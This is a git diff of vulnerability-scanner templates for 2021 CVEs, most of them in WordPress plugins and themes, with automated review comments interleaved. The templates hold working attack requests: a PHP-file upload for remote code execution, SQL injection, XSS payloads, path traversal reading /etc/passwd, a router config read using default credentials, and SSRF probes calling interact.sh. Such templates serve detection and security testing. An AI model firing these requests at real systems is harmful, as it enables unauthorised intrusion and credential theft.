- tags: cve,cve2021,wordpress,wp-plugin,rce,wp,intrusive,unauth,fileupload -variables: - zip_file: "{{to_lower(rand_text_alpha(6))}}" - php_file: "{{to_lower(rand_text_alpha(2))}}.php" - php_cmd: "" -requests: - - raw: - - | - POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=------------------------d3be34324392a708 - - --------------------------d3be34324392a708 - Content-Disposition: form-data; name="fonticonzipfile"; filename="{{zip_file}}.zip" - Content-Type: application/octet-stream - - 
{{hex_decode('504B03040A0000000000FA73F454B2333E07140000001400000006001C00')}}{{php_file}}{{hex_decode('555409000366CBD76267CBD76275780B000104F50100000414000000')}}{{php_cmd}}{{hex_decode('0A504B01021E030A00000000002978F454E49BC1591300000013000000060018000000000001000000A48100000000')}}{{php_file}}{{hex_decode('555405000366CBD76275780B000104F50100000414000000504B050600000000010001004C000000530000000000')}} - --------------------------d3be34324392a708 - Content-Disposition: form-data; name="fontsetname" - - {{zip_file}} - --------------------------d3be34324392a708 - Content-Disposition: form-data; name="action" - - uploadFontIcon - --------------------------d3be34324392a708-- - - | - GET /wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/{{php_file}} HTTP/1.1 - Host: {{Hostname}} - req-condition: true - matchers-condition: and - matchers: - - type: word - part: body_1 - words: - - "wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/style.css" - - type: word - part: body_2 - words: - - "phpinfo()" - - type: status - status: - - 200 diff --git a/poc/cve/cve-2021-24285-5673.yaml b/poc/cve/cve-2021-24285-5673.yaml deleted file mode 100644 index af2df857a4..0000000000 --- a/poc/cve/cve-2021-24285-5673.yaml +++ /dev/null 
@@ -1,33 +0,0 @@ -id: CVE-2021-24285 -info: - name: Car Seller - Auto Classifieds Script WordPress plugin SQLI - author: ShreyaPohekar - severity: critical - description: The request_list_request AJAX call of the Car Seller - Auto Classifieds Script WordPress plugin through 2.1.0, available to both authenticated and unauthenticated users, does not sanitise, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL Injection issue. - tags: cve,cve2021,wordpress,wp-plugin,sqli - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-24285 - - https://codevigilant.com/disclosure/2021/wp-plugin-cars-seller-auto-classifieds-script-sql-injection/ - - https://wpscan.com/vulnerability/f35d6ab7-dd52-48b3-a79c-3f89edf24162 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2021-24285 - cwe-id: CWE-89 -requests: - - raw: - - | - POST /wp-admin/admin-ajax.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - action=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "qzvvqhWAAlCfTiMDmAoqzkTpJEzPwVFSaIpfAfdfTinrMqqxkq" - part: body diff --git a/poc/cve/cve-2021-24286(1).yaml b/poc/cve/cve-2021-24286(1).yaml deleted file mode 100644 index 44f7dffcf1..0000000000 --- a/poc/cve/cve-2021-24286(1).yaml +++ /dev/null 
@@ -1,21 +0,0 @@ -id: CVE-2021-24286 -info: - name: Redirect 404 to Parent < 1.3.1 - Reflected Cross-Site Scripting - author: geeknik - description: The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue - reference: https://wpscan.com/vulnerability/b9a535f3-cb0b-46fe-b345-da3462584e27 - severity: medium - tags: cve,cve2021,xss -requests: - - method: GET - path: - - "{{BaseURL}}/wp-admin/options-general.php?page=moove-redirect-settings&tab=\" onMouseOver=\"alert(1);" - matchers-condition: and - matchers: - - type: word - words: - - "\" onMouseOver=\"alert(1);" - - type: word - part: header - words: - - "text/html" diff --git a/poc/cve/cve-2021-24335-5703.yaml b/poc/cve/cve-2021-24335-5703.yaml new file mode 100644 index 0000000000..3fb28432a1 --- /dev/null +++ b/poc/cve/cve-2021-24335-5703.yaml 
@@ -0,0 +1,34 @@
+id: CVE-2021-24335
+info:
+ name: Car Repair Services < 4.0 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ description: The Car Repair Services & Auto Mechanic WordPress theme before 4.0 did not properly sanitise its serviceestimatekey search parameter before outputting it back in the page, leading to a reflected Cross-Site Scripting issue
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24335
+ - https://themeforest.net/item/car-repair-services-auto-mechanic-wordpress-theme/19823557
+ - https://m0ze.ru/vulnerability/[2021-02-12]-[WordPress]-[CWE-79]-Car-Repair-Services-WordPress-Theme-v3.9.txt
+ - https://wpscan.com/vulnerability/39258aba-2449-4214-a490-b8e46945117d
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-24335
+ cwe-id: CWE-79
+ tags: cve,cve2021,wordpress,xss,wp-plugin
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+ - type: word
+ part: header
+ words:
+ - text/html
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/cve-2021-24364-5721.yaml b/poc/cve/cve-2021-24364-5721.yaml
new file mode 100644
index 0000000000..c4c6eeebd2
--- /dev/null
+++ b/poc/cve/cve-2021-24364-5721.yaml
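Review bot: The body matcher's only word appears on this page as an empty string (`- ""`); if the committed file really contains that, the matcher is satisfied by any response and the template reports every HTML 200 page as vulnerable. The same applies to `- ''` in the CVE-2021-24364 template and to the empty `woof_redraw_elements[]=` value with its `[""]` word in CVE-2021-25085, so all three should be checked against the files themselves, since the markup may only have been lost in rendering. Separately, the description calls this a theme but the tag is `wp-plugin`; `wp-theme`, as used for CVE-2021-24364, would fit. The hard-coded `/car1/` path prefix looks specific to one installation (inferred), which would cause misses elsewhere.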
@@ -0,0 +1,32 @@
+id: CVE-2021-24364
+info:
+ name: Jannah < 5.4.4 (XSS)
+ author: pikpikcu
+ severity: medium
+ description: The Jannah WordPress theme before 5.4.4 did not properly sanitize the options JSON parameter in its tie_get_user_weather AJAX action before outputting it back in the page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.
+ reference:
+ - https://wpscan.com/vulnerability/1d53fbe5-a879-42ca-a9d3-768a80018382
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24364
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-24364
+ cwe-id: CWE-79
+ tags: cve,cve2021,wordpress,xss,wp-theme
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D'
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ''
+ part: body
+ - type: word
+ part: header
+ words:
+ - text/html
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/cve-2021-24488(1).yaml b/poc/cve/cve-2021-24488(1).yaml
new file mode 100644
index 0000000000..258fbbb072
--- /dev/null
+++ b/poc/cve/cve-2021-24488(1).yaml
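Review bot: `name: Jannah < 5.4.4 (XSS)` does not say what kind of product this is or which class of XSS, unlike the other titles in this commit. The description already supplies both facts, so the title could read `name: Jannah Theme < 5.4.4 - Reflected Cross-Site Scripting`. That keeps scan reports and tag-free searches readable without opening the template.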
@@ -0,0 +1,40 @@
+id: CVE-2021-24488
+info:
+ name: WordPress Plugin Post Grid < 2.1.8 - XSS
+ author: cckuailong
+ severity: medium
+ description: The slider import search feature and tab parameter of the Post Grid WordPress plugin before 2.1.8 settings are not properly sanitised before being output back in the pages, leading to Reflected Cross-Site Scripting issues
+ reference:
+ - https://wpscan.com/vulnerability/1fc0aace-ba85-4939-9007-d150960add4a
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-24488
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-24488
+ cwe-id: CWE-79
+ tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated
+requests:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Content-Type: application/x-www-form-urlencoded
+ Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+ - |
+ GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(document.domain)// HTTP/1.1
+ Host: {{Hostname}}
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'value="\"onmouseover=alert(document.domain)/">'
+ - 'Post Grid'
+ condition: and
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/cve-2021-24498-5751.yaml b/poc/cve/cve-2021-24498-5751.yaml
deleted file mode 100644
index 16b53e0f1e..0000000000
--- a/poc/cve/cve-2021-24498-5751.yaml
+++ /dev/null
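Review bot: Unlike the other reflected-XSS templates in this commit, this one has no header matcher for `text/html`, so a response of another content type that echoes the value would still be reported. A third matcher of `type: word` on `part: header` with the word `text/html` would bring it in line with its neighbours. The template also has no matcher tied to the login request, so a failed login is only caught indirectly through the status of the second response (inferred from the visible matchers).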
@@ -1,31 +0,0 @@ -id: CVE-2021-24498 -info: - name: Calendar Event Multi View < 1.4.01 - Unauthenticated Reflected Cross-Site Scripting (XSS) - author: suman_kar - description: The plugin does not sanitise or escape the 'start' and 'end' GET parameters before outputting them in the page (via php/edit.php), leading to a reflected Cross-Site Scripting issue. - severity: medium - tags: cve,cve2021,xss,wordpress,wp-plugin - reference: https://wpscan.com/vulnerability/3c5a5187-42b3-4f88-9b0e-4fdfa1c39e86 -requests: - - raw: - - | - GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1 - Host: {{Hostname}} - Accept-Encoding: gzip, deflate - Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 - Connection: close - matchers-condition: and - matchers: - - type: word - words: - - '><' - - 'Calendar Details' - part: body - condition: and - - type: word - words: - - 'text/html' - part: header - - type: status - status: - - 200 diff --git a/poc/cve/cve-2021-24838-5769.yaml b/poc/cve/cve-2021-24838-5769.yaml deleted file mode 100644 index abc53d31b1..0000000000 --- a/poc/cve/cve-2021-24838-5769.yaml +++ /dev/null 
@@ -1,28 +0,0 @@ -id: CVE-2021-24838 -info: - name: AnyComment <= 0.2.21 - Open Redirect - author: noobexploiter - severity: medium - description: The plugin has an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated first, leading to an Open Redirect issue, which according to the vendor, is a feature. - reference: - - https://wpscan.com/vulnerability/562e81ad-7422-4437-a5b4-fcab9379db82 - - https://nvd.nist.gov/vuln/detail/CVE-2021-24838 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-24838 - cwe-id: CWE-601 - tags: cve,cve2021,wordpress,wp-plugin,open-redirect -requests: - - method: GET - path: - - "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://example.com" - matchers-condition: and - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - - type: status - status: - - 302 diff --git a/poc/cve/cve-2021-25033(1).yaml b/poc/cve/cve-2021-25033(1).yaml deleted file mode 100644 index 5348a3bb8c..0000000000 --- a/poc/cve/cve-2021-25033(1).yaml +++ /dev/null 
@@ -1,27 +0,0 @@ -id: CVE-2021-25033 -info: - name: Noptin < 1.6.5 - Open Redirect - author: dhiyaneshDk - severity: medium - description: Noptin < 1.6.5 is susceptible to an open redirect vulnerability. The plugin does not validate the "to" parameter before redirecting the user to its given value, leading to an open redirect issue. - reference: - - https://wpscan.com/vulnerability/c2d2384c-41b9-4aaf-b918-c1cfda58af5c - - https://plugins.trac.wordpress.org/changeset/2639592 - - https://nvd.nist.gov/vuln/detail/CVE-2021-25033 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-25033 - cwe-id: CWE-601 - tags: cve,cve2021,wordpress,redirect,wp-plugin,noptin,wp -requests: - - method: GET - path: - - "{{BaseURL}}/?noptin_ns=email_click&to=https://interact.sh" - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - -# Enhanced by mp on 2022/04/13 diff --git a/poc/cve/cve-2021-25075(1).yaml b/poc/cve/cve-2021-25075(1).yaml deleted file mode 100644 index c3af39b163..0000000000 --- a/poc/cve/cve-2021-25075(1).yaml +++ /dev/null 
@@ -1,53 +0,0 @@ -id: CVE-2021-25075 -info: - name: WordPress Duplicate Page or Post < 1.5.1 - Stored XSS - author: DhiyaneshDK - severity: low - description: | - The plugin does not have any authorisation and has a flawed CSRF check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing any authenticated users, such as subscriber to call it and change the plugin's settings, or perform such attack via CSRF. Furthermore, due to the lack of escaping, this could lead to Stored Cross-Site Scripting issues. - remediation: Fixed in version 1.5.1. - reference: - - https://wpscan.com/vulnerability/db5a0431-af4d-45b7-be4e-36b6c90a601b - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25075 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N - cvss-score: 3.50 - cve-id: CVE-2021-25075 - cwe-id: CWE-862 - tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | - POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - action=wpdevart_duplicate_post_parametrs_save_in_db&title_prefix=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2fXSS%2f%29+p - - | - GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1 - Host: {{Hostname}} - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "style=animation-name:rotation onanimationstart=alert(/XSS/) p" - - "toplevel_page_wpda_duplicate_post_menu" - condition: and - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 
diff --git a/poc/cve/cve-2021-25085(1).yaml b/poc/cve/cve-2021-25085(1).yaml
new file mode 100644
index 0000000000..6dae7e423c
--- /dev/null
+++ b/poc/cve/cve-2021-25085(1).yaml
@@ -0,0 +1,37 @@
+id: CVE-2021-25085
+info:
+ name: WOOF WordPress plugin - Reflected Cross-Site Scripting
+ author: Maximus Decimus
+ severity: medium
+ description: |
+ The WOOF WordPress plugin does not sanitize or escape the woof_redraw_elements parameter before reflecting it back in an admin page, leading to a reflected cross-site scripting.
+ reference:
+ - https://wpscan.com/vulnerability/b7dd81c6-6af1-4976-b928-421ca69bfa90
+ - https://plugins.trac.wordpress.org/changeset/2648751
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-25085
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-25085
+ metadata:
+ verified: true
+ tags: cve,cve2021,wordpress,wp-plugin,wp,xss
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-admin/admin-ajax.php?action=woof_draw_products&woof_redraw_elements[]="
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '"additional_fields":[""]}'
+ - type: word
+ part: header
+ words:
+ - text/html
+ - type: status
+ status:
+ - 200
+
+# Enhanced by cs 06/21/2022
diff --git a/poc/cve/cve-2021-25118(1).yaml b/poc/cve/cve-2021-25118(1).yaml
new file mode 100644
index 0000000000..f037f16c59
--- /dev/null
+++ b/poc/cve/cve-2021-25118(1).yaml
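Review bot: `classification` has no `cwe-id`, although the other reflected-XSS templates in this commit that carry a classification block set `cwe-id: CWE-79`; adding that line keeps CWE-based filtering and reporting consistent. The trailer `# Enhanced by cs 06/21/2022` also uses a different date format from the `# Enhanced by mp on 2022/..` trailers elsewhere in the commit, which makes the trailers harder to sort or parse.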
@@ -0,0 +1,39 @@
+id: CVE-2021-25118
+info:
+ name: Yoast SEO < 17.3 - Path Disclosure
+ author: DhiyaneshDK
+ severity: medium
+ description: The plugin discloses the full internal path of featured images in posts via the wp/v2/posts REST endpoints which could help an attacker identify other vulnerabilities or help during the exploitation of other identified vulnerabilities.
+ reference:
+ - https://wpscan.com/vulnerability/2c3f9038-632d-40ef-a099-6ea202efb550
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-25118
+ - https://plugins.trac.wordpress.org/changeset/2608691
+ remediation: Fixed in version 17.3
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2021-25118
+ cwe-id: CWE-200
+ tags: wordpress,cve2021,wp-plugin,fpd,cve,wp
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-json/wp/v2/posts?per_page=1"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - '"path":"(.*)/wp-content\\(.*)","size'
+ - type: word
+ part: header
+ words:
+ - "application/json"
+ - type: status
+ status:
+ - 200
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - '"path":"(.*)/wp-content\\(.*)","size'
diff --git a/poc/cve/cve-2021-26085(1).yaml b/poc/cve/cve-2021-26085(1).yaml
new file mode 100644
index 0000000000..f2032f23ff
--- /dev/null
+++ b/poc/cve/cve-2021-26085(1).yaml
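Review bot: Both copies of the regex use greedy `(.*)` groups, so on a response with several `path` entries the first group can run across unrelated JSON fields and the extracted value is not the path alone. Bounding each group to one JSON string, `'"path":"([^"]*)/wp-content\\([^"]*)","size'`, keeps the match inside a single value. The regex matcher also has no `part`, so `part: body` should be stated as it is on the extractor. The extractor writes the disclosed server path into scan output, which matters when reports are shared outside the team.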
@@ -0,0 +1,34 @@
+id: CVE-2021-26085
+info:
+ name: Confluence Pre-Authorization Arbitrary File Read in /s/ endpoint - CVE-2021-26085
+ author: princechaddha
+ severity: medium
+ description: Affected versions of Atlassian Confluence Server allow remote attackers to view restricted resources via a Pre-Authorization Arbitrary File Read vulnerability in the /s/ endpoint.
+ reference:
+ - https://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-26085
+ - https://jira.atlassian.com/browse/CONFSERVER-67893
+ - http://packetstormsecurity.com/files/164401/Atlassian-Confluence-Server-7.5.1-Arbitrary-File-Read.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2021-26085
+ cwe-id: CWE-862
+ metadata:
+ shodan-query: http.component:"Atlassian Confluence"
+ tags: cve,cve2021,confluence,atlassian,lfi,kev
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ part: body
+ words:
+ - "Confluence"
+ - "com.atlassian.confluence.setup.ConfluenceAppConfig"
+ condition: and
diff --git a/poc/cve/cve-2021-27519(1).yaml b/poc/cve/cve-2021-27519(1).yaml
deleted file mode 100644
index 97b1350cae..0000000000
--- a/poc/cve/cve-2021-27519(1).yaml
+++ /dev/null
@@ -1,38 +0,0 @@ -id: CVE-2021-27519 -info: - name: FUDForum 3.1.0 - Reflected XSS - author: kh4sh3i - severity: medium - description: | - A cross-site scripting (XSS) issue in FUDForum 3.1.0 allows remote attackers to inject JavaScript - reference: - - https://www.exploit-db.com/exploits/49942 - - https://nvd.nist.gov/vuln/detail/CVE-2021-27519 - - https://github.com/fudforum/FUDforum/issues/2 - - http://packetstormsecurity.com/files/162942/FUDForum-3.1.0-Cross-Site-Scripting.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-27519 - cwe-id: CWE-79 - metadata: - shodan-query: 'http.html:"Powered by: FUDforum"' - verified: "true" - tags: cve,cve2021,xss,fudforum -requests: - - method: GET - path: - - '{{BaseURL}}/index.php?SQ=0&srch=x"+onmouseover%3Dalert%281%29+x%3D"&t=search&btn_submit.x=0&btn_submit.y=0' - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'highlightSearchTerms("x" onmouseover=alert(1) x="");' - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/poc/cve/cve-2021-27748(1).yaml b/poc/cve/cve-2021-27748(1).yaml new file mode 100644 index 0000000000..23f9aef7c7 --- /dev/null +++ b/poc/cve/cve-2021-27748(1).yaml 
@@ -0,0 +1,33 @@
+id: CVE-2021-27748
+info:
+ name: IBM WebSphere HCL Digital Experience - Server-Side Request Forgery
+ author: pdteam
+ severity: high
+ description: |
+ IBM WebSphere HCL Digital Experience is susceptible to server-side request forgery vulnerability that impacts on-premise deployments and containers.
+ reference:
+ - https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/
+ - https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095665
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27748
+ classification:
+ cve-id: CVE-2021-27748
+ metadata:
+ verified: true
+ shodan-query: http.html:"IBM WebSphere Portal"
+ tags: cve,cve2021,hcl,ibm,ssrf,websphere
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/docpicker/internal_proxy/http/interact.sh'
+ - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/interact.sh'
+ redirects: true
+ max-redirects: 2
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Interactsh Server"
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/cve-2021-28149-5943.yaml b/poc/cve/cve-2021-28149-5943.yaml
deleted file mode 100644
index 18c48fcc12..0000000000
--- a/poc/cve/cve-2021-28149-5943.yaml
+++ /dev/null
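Review bot: The word matcher `"Interactsh Server"` has no `part:` and depends on the landing-page text of the hard-coded third-party host `interact.sh`, so the check comes back negative whenever the target has no outbound route to that host or the page wording changes. A clean result from this template should therefore not be read as "not affected", and I would say so next to the matcher: `# a negative result is inconclusive if the target cannot reach interact.sh`. The `classification:` block also carries only `cve-id`, while sibling templates in this commit include `cvss-metrics`, `cvss-score` and `cwe-id`; `cwe-id: CWE-918` is the value the Jellyfin SSRF template uses.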
@@ -1,43 +0,0 @@ -id: CVE-2021-28149 -info: - name: Hongdian Directory Traversal - author: gy741 - severity: medium - description: | - Hongdian H8922 3.0.5 devices allow Directory Traversal. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file. - reference: - - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-28149 - - http://en.hongdian.com/Products/Details/H8922 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 6.5 - cve-id: CVE-2021-28149 - cwe-id: CWE-22 - tags: cve,cve2021,hongdian,traversal -requests: - - raw: - - | - GET /log_download.cgi?type=../../etc/passwd HTTP/1.1 - Host: {{Hostname}} - Cache-Control: max-age=0 - Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= - - | - GET /log_download.cgi?type=../../etc/passwd HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic YWRtaW46YWRtaW4= - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "application/octet-stream" - part: header - - type: regex - regex: - - "root:.*:0:0:" - - "sshd:[x*]" - - "root:[$]" - part: body diff --git a/poc/cve/cve-2021-28150-5949.yaml b/poc/cve/cve-2021-28150-5949.yaml deleted file mode 100644 index 41e5c3d5da..0000000000 --- a/poc/cve/cve-2021-28150-5949.yaml +++ /dev/null 
@@ -1,39 +0,0 @@ -id: CVE-2021-28150 -info: - name: Hongdian Sensitive Information - author: gy741 - severity: medium - description: Hongdian H8922 3.0.5 devices allow the unprivileged guest user to read cli.conf (with the administrator password and other sensitive data) via /backup2.cgi. - reference: - - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-28150 - tags: cve,cve2021,hongdian,exposure - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.50 - cve-id: CVE-2021-28150 - cwe-id: CWE-20 -requests: - - raw: - - | - GET /backup2.cgi HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= - - | - GET /backup2.cgi HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic YWRtaW46YWRtaW4= - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "application/octet-stream" - part: header - - type: word - words: - - "CLI configuration saved from vty" - - "service webadmin" - part: body diff --git a/poc/cve/cve-2021-28377(1).yaml b/poc/cve/cve-2021-28377(1).yaml new file mode 100644 index 0000000000..d55e6fcef0 --- /dev/null +++ b/poc/cve/cve-2021-28377(1).yaml 
@@ -0,0 +1,27 @@
+id: CVE-2021-28377
+info:
+ name: ChronoForums 2.0.11 - Directory Traversal
+ author: 0x_Akoko
+ severity: medium
+ description: The ChronoForums avatar function is vulnerable through unauthenticated path traversal attacks. This enables unauthenticated attackers to read arbitrary files, for example the Joomla! configuration file which contains credentials.
+ reference:
+ - https://herolab.usd.de/en/security-advisories/usd-2021-0007/
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-28377
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2021-28377
+ cwe-id: CWE-22
+ tags: cve,cve2021,chronoforums,lfi,joomla
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/cve-2021-28918-5975.yaml b/poc/cve/cve-2021-28918-5975.yaml
new file mode 100644
index 0000000000..a28e3035b4
--- /dev/null
+++ b/poc/cve/cve-2021-28918-5975.yaml
@@ -0,0 +1,37 @@
+id: CVE-2021-28918
+info:
+ name: Netmask NPM Package - Server-Side Request Forgery
+ author: johnjhacking
+ severity: critical
+ description: Netmask NPM Package is susceptible to server-side request forgery because of improper input validation of octal strings in netmask npm package. This allows unauthenticated remote attackers to perform indeterminate SSRF, remote file inclusion, and local file inclusion attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts.
+ reference:
+ - https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md
+ - https://github.com/advisories/GHSA-pch5-whg9-qr2r
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-28918
+ - https://github.com/rs/node-netmask
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+ cvss-score: 9.1
+ cve-id: CVE-2021-28918
+ cwe-id: CWE-20
+ tags: cve,cve2021,npm,netmask,ssrf,lfi
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/?url=http://0177.0.0.1/server-status"
+ - "{{BaseURL}}/?host=http://0177.0.0.1/server-status"
+ - "{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd"
+ stop-at-first-match: true
+ matchers-condition: or
+ matchers:
+ - type: word
+ part: body
